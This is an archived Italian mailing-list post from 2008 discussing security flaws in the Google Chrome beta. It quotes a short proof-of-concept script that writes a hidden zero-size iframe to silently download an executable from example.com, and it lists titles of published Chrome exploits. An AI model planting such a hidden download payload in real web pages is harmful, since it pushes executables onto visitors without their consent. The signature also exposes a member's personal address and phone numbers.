[HUF] Re: Google Chrome

  • From: Massimiliano Milanesi <m_milanesi@xxxxxxxx>
  • To: huf@xxxxxxxxxxxxx
  • Date: Tue, 09 Sep 2008 20:42:56 +0200

Andiamo bene... Questo Google Chrome non mi ha incuriosito per nulla sin dalla sua prima uscita, figuriamoci ora. E poi la privacy con Google te la scordi, per via di quella licenza assurda... :/

SystemFAILURE BioHazard ha scritto:
Per chi non lo sapesse ancora (ma dubito ce ne sia qualcuno) Google Chrome e' il browser in sviluppo da Google , attualmente in beta-phase . Sono gia' stati riscontrati svariati bug , alcuni high-risk rated , come ....



***************************************************************************
Author: nerex
E-mail: nerex[at]live[dot]com

Google's new Web browser (Chrome) allows files (e.g., executables) to be automatically
downloaded to the user's computer without any user prompt.

This proof-of-concept was created for educational purposes only.
Use the code it at your own risk.
The author will not be responsible for any damages.

Tested on Windows Vista SP1 and Windows XP SP3 with Google Chrome (BETA)
**************************************************************************
<script>
document.write('<iframe src="" class="moz-txt-link-rfc2396E" href="http://www.example.com/hello.exe">"http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');
</script>



Questo e' uno dei piu' gravi direi . Ne abbiamo anche altri comunque da non sottovalutare . Il classico milw0rm ne ha nel database 6 .

Google Chrome Browser 0.2.149.27 Inspect Element DoS Exploit
Google Chrome Browser 0.2.149.27 A HREF Denial of Service Exploit
Google Chrome Browser 0.2.149.27 (SaveAs) Remote BOF Exploit
Google Chrome Browser 0.2.149.27 (1583) Remote Silent Crash PoC
Google Chrome Browser 0.2.149.27 Automatic File Download Exploit <== che e' quel che vi ho appena mostrato
Google Chrome Browser 0.2.149.27 malicious link DoS Vulnerability


Pare anche che per lo sviluppo sia utilizzata un versione del webkit che soffre di bug (ovvero quella di Maggio) . Anche per quanto riguarda la privacy non ha un buon nome : basta leggere la licenza che tra le righe intende 'quel che tu fai e\' si di tuo copyright ma Google puo\' farne quel che vuole' .

Come esperienza personale , ho testato il browser : pare voler puntare a qualcosa di grosso e fino ad ora mi piace abbastanza il lavoro che stanno facendo , ma andando ad analizzare i punti appena esposti , dubito fortemente che la comunita' degli hacker sara' tanto vogliosa di abbandonare i propri browser preferiti per passare a gChrome (che tra l'altro fino ad ora , pur essendo opensource , non ha dato niente alla comunita' Linux) . A voi le opinioni , i commenti e le critiche al riguardo .


-- 
Massimiliano Milanesi
via A. Savoia 2 - 27100 Pavia (PV)
TEL: 0382573056 - FAX: 03821750755
CELL: 3405017291
email: m_milanesi@xxxxxxxx
Messenger: m_milanesi@xxxxxxxxxxx



----
Email.it, the professional e-mail, gratis per te:clicca qui

Sponsor:
Offerte a Riccione. Prenota ora su vacanzedivertenti.it
Clicca qui


Other related posts: